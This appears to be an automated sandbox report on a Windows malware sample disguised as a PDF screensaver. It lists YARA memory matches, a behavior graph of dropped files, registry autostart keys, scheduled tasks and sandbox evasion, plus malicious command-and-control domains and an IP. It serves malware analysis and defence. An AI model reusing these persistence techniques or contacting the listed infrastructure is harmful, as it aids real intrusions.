Source: Yara match File source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C22163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 6_2_00C22163
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 798041 Sample: 004349256789197.pdf.scr.exe Startdate: 03/02/2023 Architecture: WINDOWS Score: 100 75 Malicious sample detected (through community Yara rule) 2->75 77 Antivirus detection for URL or domain 2->77 79 Sigma detected: Scheduled temp file as task from temp location 2->79 81 11 other signatures 2->81 10 004349256789197.pdf.scr.exe 40 2->10         started        14 ihgsvw.exe 2 2->14         started        16 wscript.exe 2->16         started        18 6 other processes 2->18 process3 file4 63 C:\Users\user\AppData\Local\...\ihgsvw.exe, PE32 10->63 dropped 91 Starts an encoded Visual Basic Script (VBE) 10->91 20 wscript.exe 1 10->20         started        93 Creates autostart registry keys with suspicious values (likely registry only malware) 14->93 95 Creates multiple autostart registry keys 14->95 22 RegSvcs.exe 14->22         started        24 ihgsvw.exe 16->24         started        26 ihgsvw.exe 18->26         started        28 ihgsvw.exe 18->28         started        30 conhost.exe 18->30         started        32 3 other processes 18->32 signatures5 process6 process7 34 ihgsvw.exe 2 4 20->34         started        38 RegSvcs.exe 24->38         started        40 RegSvcs.exe 26->40         started        42 RegSvcs.exe 28->42         started        file8 61 C:\Users\user\AppData\Local\...\RegSvcs.exe, PE32 34->61 dropped 83 Antivirus detection for dropped file 34->83 85 Multi AV Scanner detection for dropped file 34->85 87 Found API chain indicative of sandbox detection 34->87 89 3 other signatures 34->89 44 RegSvcs.exe 1 11 34->44         started        signatures9 process10 dnsIp11 71 december2n.duckdns.org 212.193.30.230, 49714, 49717, 49719 SPD-NETTR Russian Federation 44->71 73 december2nd.ddns.net 44->73 65 C:\Program Files (x86)\...\dhcpmon.exe, PE32 44->65 dropped 67 C:\Users\user\AppData\Roaming\...\run.dat, data 44->67 dropped 69 C:\Users\user\AppData\Local\...\tmpA401.tmp, XML 44->69 dropped 97 Protects its processes via BreakOnTermination flag 44->97 99 Uses schtasks.exe or at.exe to add and modify task schedules 44->99 101 Hides that the sample has been downloaded from the Internet (zone.identifier) 44->101 49 schtasks.exe 1 44->49         started        51 schtasks.exe 1 44->51         started        53 ihgsvw.exe 44->53         started        file12 signatures13 process14 process15 55 conhost.exe 49->55         started        57 conhost.exe 51->57         started        59 RegSvcs.exe 53->59         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
212.193.30.230
 december2nd.ddns.net Russian Federation
57844 SPD-NETTR true

Contacted Domains

Name IP Active
december2nd.ddns.net 212.193.30.230 true
december2n.duckdns.org 212.193.30.230 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
december2nd.ddns.net true
  • Avira URL Cloud: malware
 unknown
december2n.duckdns.org true
  • Avira URL Cloud: malware
 unknown